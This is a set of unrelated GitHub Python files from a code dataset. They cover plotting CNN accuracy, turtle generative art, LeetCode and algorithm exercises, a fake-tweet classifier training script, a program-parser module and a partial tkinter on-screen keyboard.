accuracy.append(CSV_accuracy[0])\n #CSV_val_acc = CSV['val_acc']\n #CSV_loss = CSV['loss']\n #CSV_acc = CSV['acc']\n\n\n #print(CSV)\nDEN = accuracy[0:10]\nRES = accuracy[10:20]\nVGG = accuracy[20:30]\n\n\n\nplt.figure(figsize=(30,20))\n\na = 5\nb = 15\nplt.plot(DEN,'k-o',linewidth = a,markersize = b, label = 'Densenet-201')\nplt.plot(RES,'m-^', linewidth = a,markersize = b,label = 'Resnet-152V2')\nplt.plot(VGG,'y-s', linewidth = a,markersize = b,label = 'VGG19')\nplt.plot(1,0.68,markersize=30, c=\"b\", lw=5, ls=\"--\", marker=\"o\", mec=\"k\", mew=8, mfc=\"w\")\nplt.axis([-0.3,10,0,1])\n\nfor i in range(len(VGG)):\n number = str(VGG[i])\n plt.text(i,VGG[i]+0.01,s=number, fontsize=25)\nfor i in range(len(RES)):\n number = str(RES[i])\n plt.text(i,RES[i]+0.02,s=number, fontsize=25)\nfor i in range(len(DEN)):\n number = str(DEN[i])\n if i == 2:\n plt.text(i,DEN[i]+0.02,s=number, fontsize=25)\n else:\n plt.text(i,DEN[i]+0.02,s=number, fontsize=25)\n\nplt.tick_params(axis='x', labelsize=30)\nplt.xlabel('Epoch',fontsize=30)\nplt.xticks([0,1,2,3,4,5,6,7,8,9,10],\n [1,2,3,4,5,6,7,8,9,10])\n\nplt.tick_params(axis='y', labelsize=30)\nplt.ylabel('Prediction accuracy',fontsize=30)\nplt.grid()\nplt.legend(prop={'size': 30},loc='best')\nplt.show()\n#VGG = pd.read_csv('E:\\새 폴더\\graph\\original\\TL_DA_VGG19.csv')\n\n","repo_name":"HMCHON/shipblock-classification","sub_path":"3DCADDATAImageClassification-/graph_script/그래프그리기2.py","file_name":"그래프그리기2.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34698181235","text":"\"\"\"\nCreated on Thu Sep 15 11:39:56 2020\nPC04 start code\n@author: Logan Turner\n********* HEY, READ THIS FIRST **********\nThis is a description of the code that is written out below. This script draws\nflowers on a bush background, and the flowers change with each iteration of the code.\n\"\"\"\nimport turtle\nimport random\n\nturtle.colormode(255)\n# turtle.tracer(0) # uncomment this line to turn off turtle's animation. You must update the image yourself using panel.update() (line 42)\n\n# Create a panel to draw on. \npanel = turtle.Screen()\nw = 600 # width of panel\nh = 600 # height of panel\npanel.setup(width=w, height=h) #600 x 600 is a decent size to work on. \n#You can experiment by making \n\n# You must make 2 turtle variables\n# You must use 2 for loops (a nested for loop counts as 2!)\n# You must use at least 1 random element (something from the random library)\n# Don't forget to comment your code! (what does each for loop do? What does the random function you'll use do?)\n\n# =============== ADD YOUR CODE BELOW! =================\n\n#Establish variables\n#name our turtles\nstarStampTurtle = turtle.Turtle() #this is the turtle that draws star stamp flower\npolygonTurtle = turtle.Turtle() #this is the turtle that draws polygon flower\n\n#name color variables\nlavendarWeb = (220, 214, 247)\nmaximumBluePurple = (166, 177, 225)\nenglishLavendar = (180, 134, 159)\nroseDust = (152, 95, 111)\nindependence = (78, 76, 103)\n\n#create colors array\ncolors = [lavendarWeb, maximumBluePurple, englishLavendar, roseDust, independence]\n\n\n#draw background\npanel.bgcolor(5,140,66)\n\n#draw 4 octagon flowers\nfor i in range (4):\n polygonTurtle.penup()\n polygonTurtle.pensize(random.randint(1,7))\n polygonTurtle.speed(random.randint(3,10))\n polygonTurtle.goto(random.randint(-200, 200), random.randint(-150, 225))\n polygonTurtle.pendown()\n polygonTurtle.pencolor(colors[i])\n polygonTurtle.fillcolor(colors[-i])\n polygonTurtle.begin_fill()\n\n for i in range (9):\n polygonTurtle.forward(25)\n polygonTurtle.right(45)\n \n polygonTurtle.end_fill()\n\n#draw random number of star-shaped stamp flowers\nstarStampTurtle.shape(\"arrow\")\n\nfor i in range(random.randint(3,10)):\n starStampTurtle.penup()\n starStampTurtle.goto(random.randint(-270, 270), random.randint(-270,270))\n starStampTurtle.turtlesize(random.randint(2, 6))\n starStampTurtle.pencolor(random.choice(colors))\n starStampTurtle.fillcolor(random.choice(colors))\n starStampTurtle.pensize(random.randint(1,10))\n starStampTurtle.speed(random.randint(3,7))\n starStampTurtle.pendown()\n starStampTurtle.begin_fill()\n starStampTurtle.stamp()\n starStampTurtle.backward(1)\n starStampTurtle.left(180)\n starStampTurtle.stamp()\n for i in range (random.randint(5,25)):\n starStampTurtle.left(45)\n starStampTurtle.shape(\"triangle\")\n starStampTurtle.stamp()\n starStampTurtle.end_fill()\n \n# panel.update() # uncomment this if you've turned off animation (line 26). I recommend leaving this outside of loops, for now.\n# =================== CLEAN UP =========================\n# uncomment the line below when you are finished with your code (before you turn it in)\n\nturtle.done()","repo_name":"ATLS1300/pc04-generative-section12-logan-turner","sub_path":"PC04_GenArt.py","file_name":"PC04_GenArt.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"629697001","text":"import numpy as np\nimport sys\n\n\ndef func(d_max, d_dic):\n count = 1\n # print(d_dic)\n for d in range(d_max + 1):\n d_num = d_dic[d]\n # print(d, d_num)\n if d_num == 1:\n d_count = np.power(2, d)\n # print('dcount: ', d_count)\n else:\n d_count = np.math.factorial(2 * d_dic[d - 1]) / (\n np.math.factorial(d_num) * np.math.factorial(2 * d_dic[d - 1] - d_num))\n\n count = count * d_count\n\n return int(count % (np.power(10, 9) + 7))\n\n\n# d_max = 2\n# d_dic = {1: 1, 0: 1, 2: 2}\n\n# print(func(d_max, d_dic))\n\nif __name__ == \"__main__\":\n n = int(sys.stdin.readline().strip())\n ds = sys.stdin.readline().strip().split(' ')\n d_dic = {}\n d_max = 0\n for d in ds:\n d = int(d)\n if d > d_max:\n d_max = d\n if not d in d_dic.keys():\n d_dic[d] = 1\n else:\n d_dic[d] += 1\n\n print(func(d_max, d_dic))\n","repo_name":"yummyLee/CAPM-based-Learning","sub_path":"zyt/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27432593453","text":"# https://leetcode.cn/problems/path-sum-iii/\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n# 二次递归 \nclass Solution: \n def rootSum(self, root: Optional[TreeNode], targetSum: int) -> int:\n if root == None:\n return 0\n \n ans = 0\n if root.val == targetSum:\n ans += 1\n ans += self.rootSum(root.left, targetSum - root.val)\n ans += self.rootSum(root.right, targetSum - root.val)\n return ans\n \n def pathSum(self, root: Optional[TreeNode], targetSum: int) -> int:\n if root == None:\n return 0\n ans = self.rootSum(root, targetSum)\n ans += self.pathSum(root.left, targetSum)\n ans += self.pathSum(root.right, targetSum)\n return ans\n\n\nclass Solution:\n def pathSum(self, root: TreeNode, targetSum: int) -> int:\n def rootSum(root, targetSum):\n if root is None:\n return 0\n\n ret = 0\n if root.val == targetSum:\n ret += 1\n\n ret += rootSum(root.left, targetSum - root.val)\n ret += rootSum(root.right, targetSum - root.val)\n return ret\n \n if root is None:\n return 0\n \n ret = rootSum(root, targetSum)\n ret += self.pathSum(root.left, targetSum)\n ret += self.pathSum(root.right, targetSum)\n return ret\n# 作者:LeetCode-Solution\n# 链接:https://leetcode.cn/problems/path-sum-iii/solution/lu-jing-zong-he-iii-by-leetcode-solution-z9td/\n# 来源:力扣(LeetCode)\n# 著作权归作者所有��商业转载请联系作者获得授权,非商业转载请注明出处。\n\n\n# 前缀和\nclass Solution:\n def pathSum(self, root: Optional[TreeNode], targetSum: int) -> int:\n prefix = collections.defaultdict(int)\n prefix[0] = 1\n \n def dfs(root, curr) -> int:\n if root == None:\n return 0\n \n ret = 0\n curr += root.val\n ret += prefix[curr - targetSum]\n prefix[curr] += 1\n ret += dfs(root.left, curr)\n ret += dfs(root.right, curr)\n prefix[curr] -= 1\n \n return ret\n \n return dfs(root, 0)\n \n \n \n \n ","repo_name":"chenzongyao200127/leetcode_in_rust","sub_path":"src/437_Path_Sum_III.py","file_name":"437_Path_Sum_III.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40345155763","text":"from tables.computed_values import ComputedValue;\nfrom tables.computed_values_types import ComputedValueType\nfrom tables.measurements import Measurements, Measurement;\nfrom tables.segments_properties import SegmentsProperties\nimport math;\n\nclass HillClimbingForce(ComputedValue):\n\n\n TYPE = \"Hill Climbing Force\";\n DESCRIPTION = \"Hill Climbing Force component of the Traction Force of the energy measurement\";\n UNITS = \"Newtons\";\n AGGREGATIONS = [];\n\n def __init__(self, id: int, measurement: Measurement, type: ComputedValueType, value: float, segment: int, direction: int):\n super().__init__(id, measurement, type, value, segment, direction);\n \n \n \n def calculate_value(self, measurement: Measurement):\n\n inclination_of_segment = SegmentsProperties().get_segment_property(\"Inclination\", measurement.segment.id)\n\n if inclination_of_segment != None:\n\n if(measurement.direction == 1):\n inclination_of_segment = inclination_of_segment * -1;\n\n return (1966 + 80) * math.sin(inclination_of_segment) * 9.81;\n\n return None;\n \n @staticmethod\n def prerequisites(measurement: Measurement):\n if measurement.type != 'obd.trac_cons':\n return False;\n else:\n return True;\n","repo_name":"sergidoce/LiRA-Visualization-Framework--Processing-Pipeline","sub_path":"pipeline/row_types/computed_values/HillClimbingForce.py","file_name":"HillClimbingForce.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43396519431","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/120924\n\ndef solution(common):\n diff1 = common[1] - common[0]\n diff2 = common[2] - common[1]\n if diff1 == diff2: # 등차수열인지 확인\n answer = common[-1] + diff1\n else: # 등비수열\n if common[1] != 0: # 혹시 0의 이슈..\n div = common[1] / common[0]\n answer = common[-1] * div\n else: # 등비에서 0이 나오면 무조건 0\n answer = 0\n return answer","repo_name":"raunee/algorithm","sub_path":"Lv.0/day2_next_number.py","file_name":"day2_next_number.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"40398560326","text":"from sklearn.cross_validation import KFold\nfrom sklearn import svm\nfrom sklearn.linear_model import LogisticRegression as logis\nfrom sklearn import preprocessing\nimport pickle\nimport numpy as np\nfrom sklearn.ensemble import ExtraTreesClassifier\nimport sys\nsys.path.insert(0, 'Text_Retrieval')\nimport csv\n\nclassifier1 = \"randomforest\"\nclassifier2 = \"randomforest\"\n\ndef test():\n\n tweet_features = np.loadtxt('output/testset_tweet_features.dat', delimiter=',')\n eff_tweets = read_list('output/testset_eff_posts.dat')\n event_testset_details = '/Users/quoctin/Documents/UNITN - No Dropbox/MediaEVAL/ME2016_unitn/Text_Retrieval/dataset/testset/multimedia_details.csv'\n\n scaler_1 = None\n with open('output/RUN_1_scaler_1.pickle', 'rb') as handle:\n scaler_1 = pickle.load(handle)\n\n detector_1 = None\n with open('output/RUN_1_classifier_1.pickle', 'rb') as handle:\n detector_1 = pickle.load(handle)\n\n tweet_features = scaler_1.transform(tweet_features)\n\n tweet_pr = detector_1.predict(tweet_features)\n\n print('\\nResults of the 1st RUN \\n')\n print('Sum of real:', sum(tweet_pr == 1))\n for ind,p in enumerate(eff_tweets):\n print(p, '\\t', tweet_pr[ind])\n\n with open('first_run.txt', 'w') as csvfile:\n fieldnames = ['post_id', 'prediction', 'explanation']\n writer = csv.DictWriter(csvfile, delimiter = '\\t', fieldnames=fieldnames)\n writer.writeheader()\n for ind, p in enumerate(eff_tweets):\n label = 'fake'\n if tweet_pr[ind] == 1:\n label = 'real'\n writer.writerow({'post_id':p, 'prediction':label,\n 'explanation':''})\n\ndef train():\n\n #\n # load tweet featurese\n #\n\n tweet_features = np.loadtxt('output/devset_tweet_features.dat', delimiter=',')\n tweet_labels = np.array(tweet_features[:, -1], dtype=int)\n tweet_features = tweet_features[:, :-1]\n\n # make the training set balanced\n training_posts = read_list('dataset_for_training/real_tweet_id.data')\n training_posts.extend(read_list('dataset_for_training/fake_tweet_id.data'))\n all_posts = read_list('output/devset_eff_posts.dat')\n used_ind = np.ones((len(all_posts),), dtype=bool)\n\n for ind,p in enumerate(all_posts):\n if not p in training_posts:\n used_ind[ind] = False\n\n tweet_features = tweet_features[used_ind, :]\n tweet_labels = tweet_labels[used_ind]\n\n #\n # training classifier 1\n #\n\n detector = None\n if classifier1 == 'logis':\n detector = logis(C=1e5, solver='liblinear', multi_class='ovr')\n elif classifier1 == 'svm':\n detector = svm.SVC()\n elif classifier1 == 'randomforest':\n detector = ExtraTreesClassifier(n_estimators=200, max_depth=None,\n min_samples_split=1, random_state=0)\n\n scaler_1 = preprocessing.StandardScaler().fit(tweet_features)\n tweet_features = scaler_1.transform(tweet_features)\n detector.fit(tweet_features, tweet_labels)\n with open('output/RUN_1_classifier_1.pickle', 'wb') as handle:\n pickle.dump(detector, handle)\n with open('output/RUN_1_scaler_1.pickle', 'wb') as handle:\n pickle.dump(scaler_1, handle)\n\n print('Training statistics\\n')\n print('Number of real tweets: ', sum(tweet_labels == 1))\n print('Number of fake tweets: ', sum(tweet_labels == -1))\n\n\ndef read_list(file_name):\n l = []\n with open(file_name, 'r') as f:\n for line in f:\n line = line.strip('\\n\\t ')\n l.append(line)\n return l\n\ndef write_list(file_name, l):\n with open(file_name, 'w') as f:\n for e in l:\n f.write('{}\\n'.format(e))\n\ndef main():\n train()\n test()\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"AlessandroBudroni/ME2016_unitn","sub_path":"RUN_1.py","file_name":"RUN_1.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"24348729037","text":"a = [] # empty list\nb = [a] # list of one element with variable\nbig_list = [1,2,3,4,5] # 5 elements in a list\n\nyes_list = [1, \"a\"] # don't do this\n\nbig_list[0] # get the first element in the list\nprint(big_list[0]) # 1\nbig_list[4] # get the fith element\n\nprint(big_list[5]) # da error\n\nbig_list.append(-1) # [1,2,3,4,5,-1]\n# index, value\nbig_list.insert(3, 25) # [1, 2, 3, 25, 4, 5, -1]\n\n# big_list = big_list + [3] \nbig_list += [3]\n\n# [1,2,3,\"a\",\"b\",\"c\"]\nprint([1,2,3] + [\"a\", \"b\", \"c\"])\n# 0 1\nmatrix = [[4, 5, 6], [1, 2, 3]]\n\nprint(matrix[0][0]) # 4\n\ninner_list = matrix[1] # [1, 2, 3]\nprint(inner_list[2]) # 3\n\n\nnumber_of_grades = 5\ngrades = []\n\nfor i in range(number_of_grades):\n # pregunta la nota\n nota = 9 # asume que pedistes la nota\n grades.append(nota)\n\n# grades has 5 elements\nprint(grades)\n\n# desde 5 hasta 20 brincando 2 cada vez\nfor i in range(5, 20, 2):\n print(i)\n\n\npares = [x + 1 for x in range(5, 100, 2)]\nprint(pares)","repo_name":"alqmy/The-Garage-Summer-Of-Code","sub_path":"day2/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32528176990","text":"'''\nCommon parser stuff\n'''\n\nimport re\n\n# clara lib imports\nfrom .common import UnknownLanguage\nfrom .model import Program, Function, Expr, Op, Var, Const, VAR_COND, VAR_RET\n\n\nclass NotSupported(Exception):\n '''\n Exception denoting that the code being parsed contains unsupported\n elements.\n '''\n\n def __init__(self, msg, line=None):\n self.line = line\n super(NotSupported, self).__init__(msg)\n\n \nclass ParseError(Exception):\n '''\n Exception denoting that the code cannot be parsed because syntax errors.\n '''\n\n def __init__(self, msg, line=None):\n super(ParseError, self).__init__(msg)\n\n\nclass Parser(object):\n '''\n Common stuff for parser for any language\n '''\n\n def __init__(self, optifs=True, postprocess=True, nobcs=False,\n slice=False):\n \n self.prog = Program()\n\n self.fncs = {}\n self.fncsl = []\n self.fnc = None\n self.loc = None\n\n self.optifs = optifs\n self.postproc = postprocess\n self.slice = slice\n\n self.loops = []\n\n self.cnt = 0\n\n self.warns = []\n\n self.hasbcs = False\n self.nobcs = nobcs\n\n def newcnt(self):\n self.cnt += 1\n return self.cnt\n\n def ssavar(self, var):\n return '%s_&%d&' % (var, self.newcnt())\n\n def addwarn(self, msg, *args):\n if args:\n msg %= args\n self.prog.addwarn(str(msg))\n\n def rmemptyfncs(self):\n '''\n Removes empty functions, i.e., declarations only\n '''\n\n for fnc in self.prog.getfncs():\n if fnc.initloc is None:\n self.prog.rmfnc(fnc.name)\n\n def rmunreachlocs(self, fnc):\n '''\n Removes unreachable locations from the graph\n '''\n\n visited = set()\n tovisit = [fnc.initloc]\n\n while len(tovisit) > 0:\n loc = tovisit.pop()\n if loc in visited:\n continue\n visited.add(loc)\n\n l1 = fnc.trans(loc, True)\n if l1:\n tovisit.append(l1)\n l2 = fnc.trans(loc, False)\n if l2:\n tovisit.append(l2)\n\n for loc in fnc.locs():\n if loc not in visited:\n fnc.rmloc(loc)\n\n def ssa(self, fnc):\n '''\n Converts exprs of each loc to SSA form\n '''\n\n for loc in fnc.locs():\n\n # Find last appearance of each var\n last = {}\n for i, (var, _) in enumerate(fnc.exprs(loc)):\n last[var] = i\n\n # Replace non-last appearance by a fresh var\n m = {}\n exprs = []\n for i, (var, expr) in enumerate(fnc.exprs(loc)):\n \n for v1, v2 in list(m.items()):\n expr = expr.replace(v1, Var(v2))\n\n if var == VAR_RET:\n newvar = var\n else:\n if last[var] > i:\n newvar = m[var] = self.ssavar(var)\n else:\n m.pop(var, None)\n newvar = var\n\n if var != newvar:\n expr.original = (var, self.cnt)\n\n exprs.append((newvar, expr))\n\n fnc.replaceexprs(loc, exprs)\n\n def rmtmp(self, fnc):\n '''\n Removes (merges) \"tmp\" or SSA-generated assignments\n '''\n\n for loc in fnc.locs():\n\n m = {}\n exprs = []\n primed = set([])\n lastret = None\n\n # Remember \"real\" vars and replace temps\n for var, expr in fnc.exprs(loc):\n\n #expr.statement = True\n \n expr.prime(primed)\n \n for v, e in list(m.items()):\n expr = expr.replace(v, e)\n\n if isinstance(expr, Op) and expr.name == 'ite':\n expr.args[0].original = None\n expr.args[1].original = None\n expr.args[2].original = None\n\n if var.endswith('&'):\n m[var] = expr\n\n else:\n if var == VAR_RET:\n lastret = len(exprs)\n \n exprs.append((var, expr))\n \n if var != VAR_RET:\n primed.add(var)\n\n # \"Merge\" return stmts\n nexprs = []\n retexpr = None\n retcond = None\n for i, (var, expr) in enumerate(exprs):\n if var == VAR_RET:\n tmpretcond = self.getretcond(expr)\n if tmpretcond is True or retcond is None:\n retcond = tmpretcond\n elif tmpretcond is not None and retcond is not True:\n retcond = Op(self.OROP, retcond, tmpretcond)\n if retexpr:\n retexpr = retexpr.replace(VAR_RET, expr)\n else:\n retexpr = expr\n\n if i == lastret:\n nexprs.append((var, retexpr))\n \n else:\n if retcond is True:\n continue\n elif retcond:\n expr = Op('ite', Op(self.NOTOP, retcond),\n expr, Var(var))\n nexprs.append((var, expr))\n\n fnc.replaceexprs(loc, nexprs)\n\n def getretcond(self, expr):\n if isinstance(expr, Op) and expr.name == 'ite':\n icond = expr.args[0]\n ct = self.getretcond(expr.args[1])\n cf = self.getretcond(expr.args[2])\n cond = []\n if ct is None and cf is None:\n return None\n if ct is True and cf is True:\n return True\n if ct:\n if ct is True:\n cond.append(icond.copy())\n else:\n cond.append(Op(self.ANDOP, icond.copy(), ct.copy()))\n if cf:\n nicond = Op(self.NOTOP, icond)\n if cf is True:\n cond.append(nicond.copy())\n else:\n cond.append(Op(self.ANDOP, nicond.copy(), cf.copy()))\n if len(cond) == 1:\n return cond[0]\n else:\n return Op(self.OROP, cond[0], cond[1])\n \n elif isinstance(expr, Var) and expr.name == VAR_RET:\n return None\n \n else:\n return True\n\n def postprocess(self):\n\n if not self.postproc:\n return\n\n self.rmemptyfncs()\n for fnc in list(self.prog.fncs.values()):\n self.rmunreachlocs(fnc)\n self.ssa(fnc)\n self.rmtmp(fnc)\n\n def visit(self, node, name=None):\n\n # Skip None-node\n if node is None:\n return\n\n # Name of the node class\n if name is None:\n name = node.__class__.__name__\n\n # Get method\n meth = getattr(self, 'visit_%s' % (name,), None)\n if meth is None:\n raise NotSupported(\"Unimplemented visitor: '%s'%s\" % (name,\n \" (%s)\" % node.value if hasattr(node, \"value\") else \"\"))\n\n # Call visitor method\n return meth(node)\n\n def visit_expr(self, node, allowlist=False, allownone=False):\n res = self.visit(node)\n\n if isinstance(res, list) and allowlist:\n ok = True\n for r in res:\n if not isinstance(r, Expr):\n ok = False\n break\n if ok:\n return res\n\n if res and not isinstance(res, Expr):\n raise ParseError(\"Expected expression, got '%s'\" % (res,),\n line=node.coord.line)\n\n if (not res) and (not allownone):\n if node:\n self.addwarn(\"Expression expected at line %s\" % (\n node.coord.line,))\n else:\n self.addwarn(\"Expression expected\")\n res = Const('?')\n\n return res\n\n def visit_if(self, node, cond, true, false):\n\n # Add condition (with new location)\n preloc = self.loc\n condloc = self.addloc('the condition of the if-statement at line %d' % (\n self.getline(cond)\n ))\n condexpr = self.visit_expr(cond, allowlist=True)\n if isinstance(condexpr, list):\n condexpr = self.expr_list_and(condexpr)\n self.addexpr(VAR_COND, condexpr)\n \n # Add true loc\n trueline = self.getline(true) or self.getline(node)\n trueloc = self.addloc('inside the if-branch starting at line %d' % (\n trueline))\n self.visit(true)\n afterloc1 = self.loc\n\n afterloc = self.addloc('after the if-statement beginning at line %s' % (\n self.getline(node)\n ))\n\n # Add (general) transitions\n self.addtrans(preloc, True, condloc)\n self.addtrans(condloc, True, trueloc)\n self.addtrans(afterloc1, True, afterloc)\n\n # Add false loc\n if false:\n falseloc = self.addloc('inside the else-branch starting at line %d' % (\n self.getline(false)))\n self.visit(false)\n afterloc2 = self.loc\n\n self.addtrans(condloc, False, falseloc)\n self.addtrans(afterloc2, True, afterloc)\n\n else:\n self.addtrans(condloc, False, afterloc)\n falseloc = None\n\n # \"Loop-less\" if-statement\n if trueloc == afterloc1 and ((not false) or falseloc == afterloc2):\n if self.optifs:\n self.optimizeif(preloc, condexpr, trueloc, falseloc)\n return\n\n self.loc = afterloc\n\n def optimizeif(self, preloc, condexpr, trueloc, falseloc):\n '''\n Optimized \"simple\" or \"loop-less\" if statement\n '''\n\n # Remove unneded part of the graph\n self.fnc.rmtrans(preloc, True)\n self.loc = preloc\n\n # Keep track of assigned vars\n varss = set()\n varsl = []\n mt = {}\n mf = {}\n\n # Add exprs from branches\n def addvars(loc, m):\n for (var, expr) in self.fnc.exprs(loc):\n newvar = self.ssavar(var)\n\n if var not in varss:\n varss.add(var)\n varsl.append(var)\n\n # Replace vars mapped so far\n for (v1, v2) in list(m.items()):\n expr = expr.replace(v1, Var(v2))\n expr.original = (var, self.cnt)\n self.addexpr(newvar, expr)\n\n # Remember replacement\n m[var] = newvar\n\n addvars(trueloc, mt)\n if falseloc is not None:\n addvars(falseloc, mf)\n\n # Add condition\n condvar = self.ssavar('$cond')\n self.addexpr(condvar, condexpr.copy())\n\n # Merge branches\n for var in varsl:\n self.addexpr(var, Op('ite', Var(condvar),\n Var(mt.get(var, var)), Var(mf.get(var, var))))\n\n def expr_list_and(self, exprs):\n\n if len(exprs) == 0:\n return None\n \n else:\n newexpr = exprs[0]\n for expr in exprs[1:]:\n newexpr = Op('&&', newexpr, expr, line=expr.line)\n return newexpr\n\n def visit_loop(self, node, init, cond, next, body, do, name, prebody=None):\n \n # Visit init stmts\n if init:\n self.visit(init)\n\n # Add condition (with new location)\n preloc = self.loc\n if isinstance(cond, Expr):\n condexpr = cond\n else:\n condexpr = self.visit_expr(cond, allowlist=True)\n if isinstance(condexpr, list):\n condexpr = self.expr_list_and(condexpr)\n \n if not condexpr:\n condexpr = Const('1')\n condloc = self.addloc(\"the condition of the '%s' loop at line %s\" % (\n name, condexpr.line or self.getline(node)))\n self.addexpr(VAR_COND, condexpr)\n\n # Add exit loc\n exitloc = self.addloc(\"*after* the '%s' loop starting at line %d\" % (\n name, self.getline(node)\n ))\n\n # Add next loc\n if next:\n nextloc = self.addloc(\"update of the '%s' loop at line %d\" % (\n name, self.getline(next)\n ))\n self.visit(next)\n else:\n nextloc = None\n\n # Add body with (new location)\n bodyloc = self.addloc(\"inside the body of the '%s' loop beginning at line %d\" % (\n name, self.getline(body) or self.getline(node)\n ))\n self.addloop((condloc, exitloc, nextloc))\n if prebody:\n for x in prebody:\n self.addexpr(*x)\n self.visit(body)\n self.poploop()\n afterloc = self.loc\n\n # Connect transitions\n self.addtrans(preloc, True, bodyloc if do else condloc)\n self.addtrans(condloc, True, bodyloc)\n self.addtrans(condloc, False, exitloc)\n if nextloc:\n self.addtrans(afterloc, True, nextloc)\n self.addtrans(nextloc, True, condloc)\n else:\n self.addtrans(afterloc, True, condloc)\n\n self.loc = exitloc\n\n def addfnc(self, name, params, rettype):\n if self.fnc:\n self.fncsl.append((self.fnc, self.loc))\n self.fnc = Function(name, params, rettype)\n self.fncs[name] = self.fnc\n self.prog.addfnc(self.fnc)\n\n def endfnc(self):\n if self.fncsl:\n self.fnc, self.loc = self.fncsl.pop()\n else:\n self.fnc = None\n self.loc = None\n\n def addloc(self, desc):\n assert (self.fnc), 'No active fnc!'\n self.loc = self.fnc.addloc(desc=desc)\n return self.loc\n\n def addexpr(self, name, expr, loc=None, idx=None):\n assert (self.fnc), 'No active fnc!'\n if not loc:\n loc = self.loc\n self.fnc.addexpr(loc, name, expr, idx=idx)\n\n def numexprs(self, loc=None):\n assert (self.fnc), 'No active fnc!'\n if not loc:\n loc = self.loc\n return self.fnc.numexprs(loc)\n\n def rmlastexprs(self, loc=None, num=1):\n assert (self.fnc), 'No active fnc!'\n if not loc:\n loc = self.loc\n self.fnc.rmlastexprs(loc, num)\n \n def addtrans(self, loc1, cond, loc2):\n assert (self.fnc), 'No active fnc!'\n self.fnc.addtrans(loc1, cond, loc2)\n\n def addtype(self, var, type, skiponexist=True):\n assert (self.fnc), 'No active fnc!'\n self.fnc.addtype(var, type, skiponexist)\n\n def hasvar(self, var):\n assert (self.fnc), 'No active fnc'\n return self.fnc.gettype(var) is not None\n\n def addloop(self, l):\n self.loops.append(l)\n\n def poploop(self):\n return self.loops.pop()\n\n def lastloop(self):\n return self.loops[-1] if len(self.loops) else None\n\n def isfncname(self, name):\n return name in self.fncs\n\n @classmethod\n def parse_code(cls, code, *args, **kwargs):\n parser = cls(*args, **kwargs)\n parser.parse(code)\n parser.postprocess()\n if parser.slice:\n parser.prog.slice()\n return parser.prog\n\n \nPARSERS = {}\n\n\ndef addlangparser(lang, parser):\n PARSERS[lang] = parser\n\n \ndef getlangparser(lang):\n if lang in PARSERS:\n return PARSERS[lang]\n raise UnknownLanguage(\"No parser for language: '%s'\" % (lang,))\n","repo_name":"iradicek/clara","sub_path":"clara/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":15640,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"19"} +{"seq_id":"13679099680","text":"def repeatedString(s, n):\n # Write your code here\n news=s\n res=[]\n if len(s)==1 and 'a' in s:\n return n\n else:\n while True:\n if len(news)n:\n news=news[:n]\n break\n elif len(news)==n:\n break\n \n for i in news:\n if i == 'a':\n res.append(i)\n \n return len(res)\n\nprint(repeatedString('kmretasscityylpdhuwjirnqimlkcgxubxmsxpypgzxtenweirknjtasxtvxemtwxuarabssvqdnktqadhyktagjxoanknhgilnm',736778906400))\n","repo_name":"arunvemireddy/Leet_Code","sub_path":"RepeatedString.py","file_name":"RepeatedString.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23257716148","text":"import os\nimport tkinter as tk\nfrom tkinter import PhotoImage\nimport subprocess\nimport threading\nimport time\nfrom multiprocessing import Process\n\nstatus = -1\nstart_t = time.time()\ntimest = 0 #0->left 1->right\nx0,y0,x1,y1 = 0,0,9,3\nclicking = 0\ntab = {\"111111\":\"1\",\"111011\":\"2\",\"11011\":\"3\",\"10111\":\"4\",\"10011\":\"5\",\"011111\":\"6\",\"011011\":\"7\",\"01011\":\"8\",\"00111\":\"9\",\"00011\":\"0\",\"111110\":\"q\",\"111010\":\"w\",\"11010\":\"e\",\"10110\":\"r\",\"10010\":\"t\",\"011110\":\"y\",\"011010\":\"u\",\"01010\":\"i\",\"00110\":\"o\",\"00010\":\"p\",\"111101\":\"a\",\"111001\":\"s\",\"11001\":\"d\",\"10101\":\"f\",\"10001\":\"g\",\"011101\":\"h\",\"011001\":\"j\",\"01001\":\"k\",\"00101\":\"l\",\"00001\":\";\",\"111100\":\"z\",\"111000\":\"x\",\"11000\":\"c\",\"10100\":\"v\",\"10000\":\"b\",\"011100\":\"n\",\"011000\":\"m\",\"01000\":\",\",\"00100\":\".\",\"00000\":\"?\"}\nres = \"\"\n\ndef split():\n global timest\n global x0,x1,y0,y1\n while(True):\n # print(\"Switch\")\n if x0!=x1:\n midx = (x0+x1)//2\n if(timest):\n timest = 0\n xx = x1\n x1 = midx\n draw()\n x1 = xx\n else:\n timest = 1\n xx = x0\n x0 = midx+1\n draw()\n x0 = xx \n elif y0!=y1:\n midy = (y0+y1)//2\n if(timest):\n timest = 0\n yy = y1\n y1 = midy\n draw()\n y1 = yy\n else:\n timest = 1\n yy = y0\n y0 = midy+1\n draw()\n y0 = yy\n time.sleep(2)\n while(clicking):\n time.sleep(0.01)\n\ndef click():\n global x0,y0,x1,y1,start_t,res\n 